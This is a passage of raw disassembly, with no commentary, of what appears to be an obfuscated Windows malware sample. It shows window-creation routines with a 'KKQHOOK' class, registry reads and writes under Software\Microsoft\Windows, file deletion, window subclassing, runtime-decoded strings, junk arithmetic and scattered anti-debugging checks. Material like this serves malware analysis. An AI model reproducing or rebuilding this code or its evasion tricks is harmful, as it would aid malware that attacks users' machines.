sub_408B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E12 proc near ; CODE XREF: sub_408ED0+2C�p
; sub_408ED0+46�p ...
var_1018 = byte ptr -1018h
var_1011 = byte ptr -1011h
var_1009 = byte ptr -1009h
var_1001 = byte ptr -1001h
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1018h
call sub_40C6B8
push ebx
push esi
push edi
lea edi, [ebp+var_1009]
lea esi, asc_446979 ; ";'*l & "
movsd
movsd
push 5
push [ebp+arg_0]
call sub_40C9BC ; GetWindow
mov ebx, eax
loc_408E3C: ; CODE XREF: sub_408E12+B4�j
or ebx, ebx
jnz short loc_408E47
xor eax, eax
jmp loc_408ECB
; ---------------------------------------------------------------------------
loc_408E47: ; CODE XREF: sub_408E12+2C�j
mov [ebp+var_2], 6C09h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
push 0FFFh
lea eax, [ebp+var_1001]
push eax
push ebx
call sub_40C9C8 ; GetClassNameA
lea edi, [ebp+var_1011]
lea esi, aHjvmnia ; "hJVmnIA"
movsd
movsd
mov eax, 13h
sub eax, dword_43C098
push eax
push [ebp+arg_4]
lea eax, [ebp+var_1001]
push eax
call sub_40181A
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_408EA4
mov eax, ebx
jmp short loc_408ECB
; ---------------------------------------------------------------------------
loc_408EA4: ; CODE XREF: sub_408E12+8C�j
call sub_40C734 ; GetCurrentProcessId
push 2
push ebx
call sub_40C9BC ; GetWindow
mov ebx, eax
lea edi, [ebp+var_1018]
lea esi, aP_rX ; "p+_R'X"
mov ecx, 7
rep movsb
jmp loc_408E3C
; ---------------------------------------------------------------------------
loc_408ECB: ; CODE XREF: sub_408E12+30�j
; sub_408E12+90�j
pop edi
pop esi
pop ebx
leave
retn
sub_408E12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408ED0 proc near ; CODE XREF: sub_40B3E8+1D6�p
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_179 = byte ptr -179h
var_178 = dword ptr -178h
var_172 = byte ptr -172h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_163 = byte ptr -163h
var_15D = byte ptr -15Dh
var_158 = byte ptr -158h
var_150 = dword ptr -150h
var_14C = byte ptr -14Ch
var_146 = byte ptr -146h
var_143 = byte ptr -143h
var_13B = byte ptr -13Bh
var_138 = byte ptr -138h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_126 = word ptr -126h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_119 = byte ptr -119h
var_118 = word ptr -118h
var_116 = word ptr -116h
var_114 = word ptr -114h
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = dword ptr -10Ah
var_106 = dword ptr -106h
var_102 = byte ptr -102h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 184h
push ebx
push esi
push edi
mov [ebp+var_118], 37B0h
inc [ebp+var_118]
push 9
push offset aRIA ; ""
call sub_40129C
push eax
push [ebp+arg_0]
call sub_408E12
mov ebx, eax
call sub_40C734 ; GetCurrentProcessId
push 8
push offset aSmdJJ ; ""
call sub_40129C
push eax
push ebx
call sub_408E12
mov ds:dword_41D89C, eax
mov [ebp+var_114], 6B90h
movzx eax, [ebp+var_114]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_114], ax
push 0
push ds:dword_41D89C
call sub_40CAAC ; ShowWindow
call sub_40C7C4 ; GetTickCount
lea eax, [ebp+var_112]
push eax
push ebx
call sub_40C9A4 ; GetWindowRect
mov [ebp+var_119], 0EFh
add [ebp+var_119], 0D4h
push 0
push ds:dword_41E8CC
push 0
push ebx
mov eax, [ebp+var_106]
sub eax, [ebp+var_10E]
push eax
mov eax, [ebp+var_10A]
sub eax, [ebp+var_112]
push eax
push 0
push 0
push 50800000h
push offset byte_447529
push offset aKkqhook ; "KKQHOOK"
push 200h
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_41FB04, eax
lea edi, [ebp+var_138]
lea esi, aFxTE ; "fX $t!E"
movsd
movsd
push 6
push offset aZaxaac ; ""
call sub_40129C
mov [ebp+var_168], eax
push 19h
push offset byte_446E01
call sub_40129C
push 0
push ds:dword_41E8CC
push 0
push ds:dword_41FB04
mov edi, dword_43C098
mov esi, edi
add esi, 2Ah
push esi
mov esi, [ebp+var_10A]
sub esi, [ebp+var_112]
sub esi, 64h
push esi
add edi, 2
push edi
push edi
push 50800000h
push eax
mov edi, [ebp+var_168]
push edi
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_41D898, eax
call sub_40C794 ; GetProcessHeap
push 6
push offset aZaxaac ; ""
call sub_40129C
push 0
push ds:dword_41E8CC
push 0
push ds:dword_41FB04
mov edi, dword_43C098
add edi, 11Ah
push edi
mov edi, [ebp+var_10A]
sub edi, [ebp+var_112]
sub edi, 64h
push edi
mov edi, dword_43C098
add edi, 3Fh
push edi
mov edi, dword_43C098
add edi, 2
push edi
push 50800009h
push offset byte_447529
push eax
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_430C28, eax
call sub_40C740 ; GetCurrentThreadId
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 2BCh
push 0
push 0
mov eax, dword_43C098
mov edx, 1Ah
sub edx, eax
push edx
mov eax, dword_43C098
add eax, 2
push eax
call sub_40CB18 ; CreateFontA
mov [ebp+var_130], eax
lea edi, [ebp+var_13B]
lea esi, aQa ; "qA"
mov ecx, 3
rep movsb
push 1
push [ebp+var_130]
push 30h
push ds:dword_41D898
call sub_40CA88 ; SendMessageA
push 8
push offset aCiscicim ; ""
call sub_40129C
push 0
push ds:dword_41E8CC
push 0
push ds:dword_430C28
mov edi, dword_43C098
add edi, 11Ah
push edi
mov edi, dword_43C098
add edi, 20h
push edi
mov edi, dword_43C098
add edi, 28h
push edi
mov edi, dword_43C098
add edi, 2
push edi
push 50800003h
push offset byte_447529
push eax
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_432DC0, eax
push 8
push offset aCiscicim ; ""
call sub_40129C
add esp, 48h
push 0
push ds:dword_41E8CC
push 0
push ds:dword_430C28
mov edi, dword_43C098
add edi, 11Ah
push edi
mov edi, dword_43C098
add edi, 2Ah
push edi
mov edi, dword_43C098
add edi, 28h
push edi
mov edi, dword_43C094
add edi, 4Dh
push edi
push 50800003h
push offset byte_447529
push eax
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_41E8C4, eax
mov [ebp+var_116], 5444h
movzx eax, [ebp+var_116]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_116], ax
mov [ebp+var_2], 1
jmp loc_409299
; ---------------------------------------------------------------------------
loc_4091E0: ; CODE XREF: sub_408ED0+3D0�j
call sub_40C854 ; IsDebuggerPresent
lea edi, [ebp+var_179]
lea esi, byte_44699B
xor ecx, ecx
inc ecx
rep movsb
push 4
push offset byte_446DF3
call sub_40129C
movzx edi, [ebp+var_2]
push edi
push eax
lea edi, [ebp+var_172]
push edi
call sub_40CC50
mov [ebp+var_178], 269Fh
mov eax, 5D57h
mul [ebp+var_178]
mov [ebp+var_180], eax
mov [ebp+var_178], eax
lea eax, [ebp+var_172]
push eax
push 0
push 143h
push ds:dword_432DC0
call sub_40CA88 ; SendMessageA
push 6
push offset dword_446DEC
call sub_40129C
movzx edi, [ebp+var_2]
add edi, 4
push edi
push eax
lea edi, [ebp+var_172]
push edi
call sub_40CC50
add esp, 28h
call sub_40C7D0 ; GetVersion
lea eax, [ebp+var_172]
push eax
push 0
push 143h
push ds:dword_41E8C4
call sub_40CA88 ; SendMessageA
call sub_40C740 ; GetCurrentThreadId
inc [ebp+var_2]
loc_409299: ; CODE XREF: sub_408ED0+30B�j
movzx eax, [ebp+var_2]
cmp eax, 0Dh
jl loc_4091E0
push 6
push offset aZaxaac ; ""
call sub_40129C
mov [ebp+var_16C], eax
push 10h
push offset byte_446DDB
call sub_40129C
push 0
push ds:dword_41E8CC
push 0
push ds:dword_41FB04
mov edi, dword_43C098
mov esi, 22h
sub esi, edi
push esi
mov edi, dword_43C098
add edi, 55h
push edi
mov edi, dword_43C098
add edi, 5Ch
push edi
mov edi, dword_43C098
add edi, 0B1h
push edi
push 50000000h
push eax
mov edi, [ebp+var_16C]
push edi
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_413F20, eax
push 6
push offset aZaxaac ; ""
call sub_40129C
mov [ebp+var_170], eax
push 0Fh
push offset byte_446DCB
call sub_40129C
push 0
push ds:dword_41E8CC
push 0
push ds:dword_41FB04
mov edi, dword_43C094
add edi, 0Bh
push edi
mov edi, dword_43C098
add edi, 45h
push edi
mov edi, dword_43C098
add edi, 7Fh
push edi
mov edi, dword_43C094
add edi, 0BEh
push edi
push 50000000h
push eax
mov edi, [ebp+var_170]
push edi
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_432DB8, eax
push 6
push offset aZaxaac ; ""
call sub_40129C
mov [ebp-174h], eax
push 0Ch
push offset word_446DBE
call sub_40129C
push 0
push ds:dword_41E8CC
push 0
push ds:dword_41FB04
mov edi, dword_43C094
add edi, 0Bh
push edi
mov edi, dword_43C098
add edi, 44h
push edi
mov edi, dword_43C098
add edi, 0A7h
push edi
mov edi, dword_43C098
add edi, 0B1h
push edi
push 50000000h
push eax
mov edi, [ebp-174h]
push edi
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_4351D8, eax
push 6
push offset aZaxaac ; ""
call sub_40129C
mov [ebp+var_178], eax
push 4Ah
push offset byte_446D73
call sub_40129C
push 0
push ds:dword_41E8CC
push 0
push ds:dword_41FB04
mov edi, dword_43C098
mov esi, 22h
sub esi, edi
push esi
mov edi, dword_43C098
add edi, 1D2h
push edi
mov edi, dword_43C098
add edi, 0D4h
push edi
mov edi, dword_43C094
add edi, 19h
push edi
push 50000000h
push eax
mov edi, [ebp+var_178]
push edi
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_432DBC, eax
push 6
push offset aZaxaac ; ""
call sub_40129C
mov [ebp-17Ch], eax
push 26h
push offset dword_446D4C
call sub_40129C
push 0
push ds:dword_41E8CC
push 0
push ds:dword_41FB04
mov edi, dword_43C094
add edi, 0Bh
push edi
mov edi, dword_43C098
add edi, 0EBh
push edi
mov edi, dword_43C094
add edi, 0FAh
push edi
mov edi, dword_43C098
add edi, 0Ch
push edi
push 50000000h
push eax
mov edi, [ebp-17Ch]
push edi
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_43A558, eax
push offset byte_433FE0
lea eax, [ebp+var_102]
push eax
call sub_40CC50
add esp, 58h
lea edi, [ebp+var_143]
lea esi, aZ_y9am4 ; "z.y9aM4"
movsd
movsd
mov [ebp+var_3], 4
jmp short loc_409529
; ---------------------------------------------------------------------------
loc_409519: ; CODE XREF: sub_408ED0+65E�j
movzx eax, [ebp+var_3]
mov [ebp+eax+var_102], 78h
add [ebp+var_3], 1
loc_409529: ; CODE XREF: sub_408ED0+647�j
mov al, [ebp+var_3]
cmp al, 0Ch
jb short loc_409519
call sub_40C854 ; IsDebuggerPresent
push 4
push offset aSraa ; ""
call sub_40129C
push 0
push ds:dword_41E8CC
push 0
push ds:dword_430C28
mov edi, dword_43C098
mov esi, edi
add esi, 6
push esi
mov esi, edi
add esi, 70h
push esi
add edi, 2
push edi
push edi
push 50800800h
lea edi, [ebp+var_102]
push edi
push eax
push 200h
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_41081C, eax
mov [ebp+var_120], 70h
mov eax, 829h
mul [ebp+var_120]
mov [ebp+var_180], eax
mov [ebp+var_120], eax
push 4
push offset aSraa ; ""
call sub_40129C
push 0
push ds:dword_41E8CC
push 0
push ds:dword_430C28
mov edi, dword_43C098
add edi, 6
push edi
mov edi, dword_43C094
add edi, 41h
push edi
mov edi, dword_43C098
add edi, 4Dh
push edi
mov edi, dword_43C098
add edi, 2
push edi
push 50800000h
push offset byte_447529
push eax
push 200h
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_41E8BC, eax
lea edi, [ebp+var_146]
lea esi, a3h ; "3h"
mov ecx, 3
rep movsb
push 0
push 78h
push 0CCh
push ds:dword_41E8BC
call sub_40CA88 ; SendMessageA
call sub_40C734 ; GetCurrentProcessId
push 6
push offset aCbaai ; ""
call sub_40129C
mov [ebp+var_184], eax
push 16h
push offset byte_446D29
call sub_40129C
add esp, 20h
push 0
push ds:dword_41E8CC
push 0
push ds:dword_41FB04
mov edi, dword_43C098
add edi, 5
push edi
mov edi, dword_43C094
add edi, 96h
push edi
mov edi, dword_43C098
add edi, 12Eh
push edi
mov edi, dword_43C098
add edi, 0Ch
push edi
push 50800000h
push eax
mov edi, [ebp+var_184]
push edi
push 0
call sub_40CAB8 ; CreateWindowExA
mov ds:dword_4351DC, eax
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 190h
push 0
push 0
mov eax, dword_43C094
inc eax
push eax
mov eax, 22h
sub eax, dword_43C098
push eax
call sub_40CB18 ; CreateFontA
mov ebx, eax
call sub_40C7D0 ; GetVersion
push 1
push ebx
push 30h
push ds:dword_432DC0
call sub_40CA88 ; SendMessageA
lea edi, [ebp+var_14C]
lea esi, aOi6 ; " oi%6"
mov ecx, 3
rep movsw
push 1
push ebx
push 30h
push ds:dword_41E8C4
call sub_40CA88 ; SendMessageA
mov eax, dword_4469AD
mov [ebp+var_150], eax
push 1
push ebx
push 30h
push ds:dword_41081C
call sub_40CA88 ; SendMessageA
lea edi, [ebp+var_158]
lea esi, a@gduN ; "@GDu N!"
mov ecx, 2
rep movsd
push 1
push ebx
push 30h
push ds:dword_41E8BC
call sub_40CA88 ; SendMessageA
mov [ebp+var_124], 2D6Ah
inc [ebp+var_124]
push 1
push ebx
push 30h
push ds:dword_432DB8
call sub_40CA88 ; SendMessageA
call sub_40C764 ; RtlGetLastWin32Error
push 1
push ebx
push 30h
push ds:dword_413F20
call sub_40CA88 ; SendMessageA
lea edi, [ebp+var_15D]
lea esi, aG_ ; "G!_`"
mov ecx, 5
rep movsb
push 1
push ebx
push 30h
push ds:dword_4351D8
call sub_40CA88 ; SendMessageA
call sub_40C734 ; GetCurrentProcessId
push 1
push ebx
push 30h
push ds:dword_4351DC
call sub_40CA88 ; SendMessageA
call sub_40C854 ; IsDebuggerPresent
push 0FFFFFFFCh
push ds:dword_432DC0
call sub_40CA28 ; GetWindowLongA
mov ds:dword_41F9F4, eax
mov [ebp+var_126], 1283h
inc [ebp+var_126]
push offset sub_40B2CA
push 0FFFFFFFCh
push ds:dword_432DC0
call sub_40CA34 ; SetWindowLongA
lea edi, [ebp+var_163]
lea esi, word_4469BE
mov ecx, 3
rep movsw
push 0FFFFFFFCh
push ds:dword_41E8C4
call sub_40CA28 ; GetWindowLongA
mov ds:dword_41E8C0, eax
push offset sub_40B2CA
push 0FFFFFFFCh
push ds:dword_41E8C4
call sub_40CA34 ; SetWindowLongA
call sub_40C794 ; GetProcessHeap
push 0FFFFFFFCh
push ds:dword_41081C
call sub_40CA28 ; GetWindowLongA
mov ds:dword_40E078, eax
mov [ebp+var_12C], 373Eh
inc [ebp+var_12C]
push offset sub_40B2CA
push 0FFFFFFFCh
push ds:dword_41081C
call sub_40CA34 ; SetWindowLongA
push 0FFFFFFFCh
push ds:dword_41E8BC
call sub_40CA28 ; GetWindowLongA
mov ds:dword_413F1C, eax
call sub_40C854 ; IsDebuggerPresent
push offset sub_40B2CA
push 0FFFFFFFCh
push ds:dword_41E8BC
call sub_40CA34 ; SetWindowLongA
call sub_40C764 ; RtlGetLastWin32Error
push ds:dword_432DC0
call sub_40C9D4 ; SetFocus
pop edi
pop esi
pop ebx
leave
retn
sub_408ED0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4098A8 proc near ; DATA XREF: sub_40AA24+80F�o
var_5614 = dword ptr -5614h
var_5610 = dword ptr -5610h
var_5609 = byte ptr -5609h
var_5602 = word ptr -5602h
var_5600 = dword ptr -5600h
var_55FA = byte ptr -55FAh
var_55F9 = byte ptr -55F9h
var_55F8 = dword ptr -55F8h
var_55F4 = dword ptr -55F4h
var_55F0 = dword ptr -55F0h
var_55EC = byte ptr -55ECh
var_55EA = dword ptr -55EAh
var_55E6 = dword ptr -55E6h
var_55E1 = byte ptr -55E1h
var_55DC = dword ptr -55DCh
var_55D6 = byte ptr -55D6h
var_472D = byte ptr -472Dh
var_472C = byte ptr -472Ch
var_4724 = byte ptr -4724h
var_471F = byte ptr -471Fh
var_4718 = dword ptr -4718h
var_4714 = byte ptr -4714h
var_470C = dword ptr -470Ch
var_4708 = dword ptr -4708h
var_4702 = byte ptr -4702h
var_4701 = byte ptr -4701h
var_4700 = word ptr -4700h
var_46FE = word ptr -46FEh
var_46FC = dword ptr -46FCh
var_46F5 = byte ptr -46F5h
var_46F4 = byte ptr -46F4h
var_46F0 = dword ptr -46F0h
var_46EC = dword ptr -46ECh
var_46E6 = word ptr -46E6h
var_46E4 = dword ptr -46E4h
var_46E0 = dword ptr -46E0h
var_46DA = byte ptr -46DAh
var_45E8 = dword ptr -45E8h
var_45E4 = dword ptr -45E4h
var_45E0 = dword ptr -45E0h
var_45DB = byte ptr -45DBh
var_45D7 = byte ptr -45D7h
var_35DF = byte ptr -35DFh
var_35DE = byte ptr -35DEh
var_35DD = byte ptr -35DDh
var_35DC = dword ptr -35DCh
var_35D8 = dword ptr -35D8h
var_35D2 = word ptr -35D2h
var_35D0 = word ptr -35D0h
var_35CE = byte ptr -35CEh
var_35CD = byte ptr -35CDh
var_25CE = word ptr -25CEh
var_25CC = dword ptr -25CCh
var_25C5 = byte ptr -25C5h
var_25C4 = byte ptr -25C4h
var_25C1 = byte ptr -25C1h
var_25BF = byte ptr -25BFh
var_15D0 = dword ptr -15D0h
var_15CC = dword ptr -15CCh
var_15C6 = byte ptr -15C6h
var_15C5 = byte ptr -15C5h
var_15C2 = word ptr -15C2h
var_15C0 = dword ptr -15C0h
var_15BC = dword ptr -15BCh
var_15B8 = dword ptr -15B8h
var_1163 = byte ptr -1163h
var_1162 = dword ptr -1162h
var_115E = byte ptr -115Eh
var_1158 = byte ptr -1158h
var_1155 = byte ptr -1155h
var_1154 = byte ptr -1154h
var_114D = byte ptr -114Dh
var_1146 = byte ptr -1146h
var_1145 = byte ptr -1145h
var_1140 = dword ptr -1140h
var_113C = byte ptr -113Ch
var_113B = byte ptr -113Bh
var_1134 = byte ptr -1134h
var_112E = word ptr -112Eh
var_112B = byte ptr -112Bh
var_102C = dword ptr -102Ch
var_1028 = dword ptr -1028h
var_1024 = dword ptr -1024h
var_101F = byte ptr -101Fh
var_101E = word ptr -101Eh
var_101C = dword ptr -101Ch
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = byte ptr -1010h
var_F0C = dword ptr -0F0Ch
var_F08 = byte ptr -0F08h
var_708 = dword ptr -708h
var_703 = byte ptr -703h
var_604 = dword ptr -604h
var_600 = byte ptr -600h
var_5A8 = byte ptr -5A8h
var_5A7 = byte ptr -5A7h
var_400 = byte ptr -400h
push ebp
mov ebp, esp
mov eax, 5614h
call sub_40C6B8
push ebx
push esi
push edi
call sub_40C7D0 ; GetVersion
mov ax, word_4469C4
mov [ebp+var_112E+1], ax
lea edi, [ebp+var_1134]
lea esi, a2gtF ; "2GT<!f"
mov ecx, 7
rep movsb
lea edi, [ebp+var_113B]
lea esi, aNjbS9 ; "NJb s9"
mov ecx, 7
rep movsb
lea edi, [ebp+var_113C]
lea esi, byte_4469D4
xor ecx, ecx
inc ecx
rep movsb
mov eax, dword_4469D5
mov [ebp+var_1140], eax
lea edi, [ebp+var_1145]
lea esi, a_3v ; ". 3"
mov ecx, 5
rep movsb
call sub_40C7C4 ; GetTickCount
push eax
call sub_40CC5C
pop ecx
mov [ebp+var_101C], 6594h
inc [ebp+var_101C]
loc_40993B: ; CODE XREF: sub_4098A8+1108�j
lea edi, [ebp+var_1146]
lea esi, byte_4469DE
xor ecx, ecx
inc ecx
rep movsb
mov eax, dword_43C094
add eax, 3
push eax
lea eax, [ebp+var_703]
push eax
call sub_40172F
push 9
push offset byte_446D1F
call sub_40129C
lea edi, [ebp+var_703]
push edi
push offset dword_433EE0
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CC50
call sub_40C854 ; IsDebuggerPresent
lea eax, [ebp+var_400]
push eax
call sub_40341E
mov [ebp+var_101E], 5439h
sub [ebp+var_101E], 33A0h
lea edi, [ebp+var_114D]
lea esi, aSiYy ; "<si+yY"
mov ecx, 7
rep movsb
push 9
push offset byte_446D15
call sub_40129C
mov edi, dword_43C0BC
push off_43C0C4[edi*4]
push eax
lea edi, [ebp+var_F08]
push edi
call sub_40CC50
push 1
push offset byte_446D13
call sub_40129C
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
mov edi, dword_43C0BC
push off_43C0C4[edi*4]
call sub_40181A
add esp, 4Ch
cmp eax, 0FFFFh
jnz short loc_409A33
push 9
push offset byte_446D09
call sub_40129C
push eax
lea edi, [ebp+var_F08]
push edi
call sub_40CC74
add esp, 10h
loc_409A33: ; CODE XREF: sub_4098A8+16D�j
call sub_40C854 ; IsDebuggerPresent
and [ebp+var_1018], 0
mov [ebp+var_102C], 4
lea edi, [ebp+var_1155]
lea esi, byte_4469E6
xor ecx, ecx
inc ecx
rep movsb
push 1Ah
push offset aZAgJIsJZAigGz ; ""
call sub_40129C
mov [ebp+var_15B8], eax
push 3
push offset word_446CEA
call sub_40129C
lea edi, [ebp+var_1154]
push edi
lea edi, [ebp+var_102C]
push edi
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp+var_15B8]
push edi
push 80000001h
call sub_4014C9
mov [ebp+var_101F], 6Ah
add [ebp+var_101F], 1
lea edi, [ebp+var_1158]
lea esi, asc_4469E7 ; "*/"
mov ecx, 3
rep movsb
push 7
push offset word_446CE2
call sub_40129C
push [ebp+var_1018]
push eax
lea edi, [ebp+var_112B]
push edi
call sub_40CC50
call sub_40C764 ; RtlGetLastWin32Error
lea eax, [ebp+var_112B]
push eax
lea eax, [ebp+var_F08]
push eax
call sub_40CC74
mov [ebp+var_1024], 7ED9h
mov eax, 39E6h
mul [ebp+var_1024]
mov [ebp+var_15BC], eax
mov [ebp+var_1024], eax
push 1
push offset byte_446CE0
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_F08]
push edi
push 0
call sub_4061F7
add esp, 6Ch
mov ebx, eax
mov [ebp+var_1028], 47D6h
mov eax, 2DD7h
mul [ebp+var_1028]
mov [ebp+var_15C0], eax
mov [ebp+var_1028], eax
or ebx, ebx
jnz short loc_409BA8
call sub_40C734 ; GetCurrentProcessId
lea eax, [ebp+var_400]
push eax
call sub_40349A
pop ecx
mov [ebp+var_15C2], 2655h
movzx eax, [ebp+var_15C2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_15C2], ax
jmp loc_40A8A0
; ---------------------------------------------------------------------------
loc_409BA8: ; CODE XREF: sub_4098A8+2CA�j
and [ebp+var_1018], 0
push 1Ah
push offset aZAgJIsJZAigGz ; ""
call sub_40129C
mov [ebp-15C4h], eax
push 3
push offset word_446CEA
call sub_40129C
push 4
push 4
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp-15C4h]
push edi
push 80000001h
call sub_40160A
push 0
lea eax, [ebp+var_400]
push eax
call sub_401A7E
add esp, 30h
mov [ebp+var_F0C], eax
or eax, eax
jz loc_40A8A0
lea edi, [ebp+var_115E]
lea esi, aOcqud ; "ocqUd"
mov ecx, 3
rep movsw
lea eax, [ebp+var_400]
push eax
call sub_40C704 ; DeleteFileA
lea eax, [ebp+var_400]
push eax
call sub_40349A
pop ecx
and [ebp+var_708], 0
jmp loc_40A867
; ---------------------------------------------------------------------------
loc_409C42: ; CODE XREF: sub_4098A8+FE2�j
mov ax, word_4469F0
mov [ebp+var_35D0], ax
cmp [ebp+var_600], 0
jz loc_40A867
call sub_40C734 ; GetCurrentProcessId
lea ecx, [ebp+var_600]
or eax, 0FFFFFFFFh
loc_409C6A: ; CODE XREF: sub_4098A8+3C7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409C6A
cmp eax, 5Ch
jb loc_40A867
mov [ebp+var_25C5], 9Bh
movzx eax, [ebp+var_25C5]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_25C5], al
mov [ebp+var_5A8], 0
mov ax, word_4469F2
mov [ebp+var_35D2], ax
push 0FFFh
lea eax, [ebp+var_25C4]
push eax
lea eax, [ebp+var_5A7]
push eax
call sub_40893E
push 0FFFh
lea eax, [ebp+var_35CD]
push eax
lea eax, [ebp+var_600]
push eax
call sub_40893E
add esp, 18h
mov [ebp+var_25CC], 1FCCh
mov eax, [ebp+var_25CC]
mov edx, eax
add edx, eax
mov [ebp+var_25CC], edx
mov [ebp+var_15C6], 0
mov [ebp+var_25CE], 35D8h
movzx eax, [ebp+var_25CE]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_25CE], ax
mov [ebp+var_15C5], 0
jmp short loc_409D40
; ---------------------------------------------------------------------------
loc_409D22: ; CODE XREF: sub_4098A8+4B1�j
movzx eax, [ebp+var_15C5]
lea edx, [ebp+eax+var_25C4]
movsx ecx, byte ptr [edx]
sub ecx, eax
mov eax, ecx
mov [edx], al
add [ebp+var_15C5], 1
loc_409D40: ; CODE XREF: sub_4098A8+478�j
lea ecx, [ebp+var_25C4]
or eax, 0FFFFFFFFh
loc_409D49: ; CODE XREF: sub_4098A8+4A6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409D49
movzx esi, [ebp+var_15C5]
cmp esi, eax
jb short loc_409D22
mov [ebp+var_35CE], 4
add [ebp+var_35CE], 1
lea ecx, [ebp+var_25C4]
or eax, 0FFFFFFFFh
loc_409D72: ; CODE XREF: sub_4098A8+4CF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409D72
lea esi, [ebp+var_35CD]
push esi
push eax
lea edi, [ebp+var_25C4]
push edi
call sub_408779
add esp, 0Ch
mov [ebp+var_35D8], eax
push 5
push offset word_446CDA
call sub_40129C
add esp, 8
mov edi, 13h
sub edi, dword_43C098
push edi
push eax
lea edi, [ebp+var_25C4]
push edi
call sub_40181A
add esp, 0Ch
cmp eax, 0
jnz loc_40A2DE
mov [ebp+var_46E4], 234h
mov eax, [ebp+var_46E4]
mov edx, eax
add edx, eax
mov [ebp+var_46E4], edx
mov eax, dword_4469F4
mov [ebp+var_470C], eax
lea edi, [ebp+var_4714]
lea esi, aMB7d ; "M;$:7d"
mov ecx, 8
rep movsb
lea eax, [ebp+var_25BF]
push eax
lea eax, [ebp+var_45DB]
push eax
call sub_40C6D8
call sub_40C854 ; IsDebuggerPresent
mov [ebp+var_35DC], 0
mov [ebp+var_46E0], 4
lea eax, [ebp+var_46F4]
push eax
lea eax, [ebp+var_46E0]
push eax
lea eax, [ebp+var_35DC]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014C9
add esp, 18h
mov [ebp+var_46F5], 9Dh
movzx eax, [ebp+var_46F5]
imul eax, 3388h
mov [ebp+var_46F5], al
mov eax, dword_43C094
add eax, 3
push eax
lea eax, [ebp+var_703]
push eax
call sub_40172F
add esp, 8
push 9
push offset byte_446D1F
call sub_40129C
add esp, 8
lea edi, [ebp+var_703]
push edi
push offset dword_433EE0
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CC50
add esp, 10h
call sub_40C764 ; RtlGetLastWin32Error
push 1
push offset byte_446CE0
call sub_40129C
add esp, 8
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_45DB]
push edi
push offset dword_41FA00
call sub_4061F7
add esp, 20h
mov ebx, eax
call sub_40C764 ; RtlGetLastWin32Error
cmp ebx, 0
jnz short loc_409F27
mov [ebp+var_472D], 69h
add [ebp+var_472D], 1
lea eax, [ebp+var_400]
push eax
call sub_40349A
add esp, 4
call sub_40C7D0 ; GetVersion
jmp short loc_409F60
; ---------------------------------------------------------------------------
loc_409F27: ; CODE XREF: sub_4098A8+659�j
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_40160A
mov eax, dword_446A00
mov [ebp+var_4718], eax
lea eax, [ebp+var_400]
push eax
call sub_40349A
add esp, 1Ch
loc_409F60: ; CODE XREF: sub_4098A8+67D�j
and [ebp+var_35DC], 0
mov [ebp+var_46E0], 4
call sub_40C794 ; GetProcessHeap
lea eax, [ebp+var_46F4]
push eax
lea eax, [ebp+var_46E0]
push eax
lea eax, [ebp+var_35DC]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014C9
add esp, 18h
push 0
push 0
push 4
push 0
push 0
push 80000000h
push offset dword_40E080
call sub_40C8CC ; CreateFileA
mov [ebp+var_46EC], eax
push 0
push eax
call sub_40C74C ; GetFileSize
mov [ebp+var_4708], eax
call sub_40C7D0 ; GetVersion
push [ebp+var_46EC]
call sub_40C7AC ; CloseHandle
call sub_40C764 ; RtlGetLastWin32Error
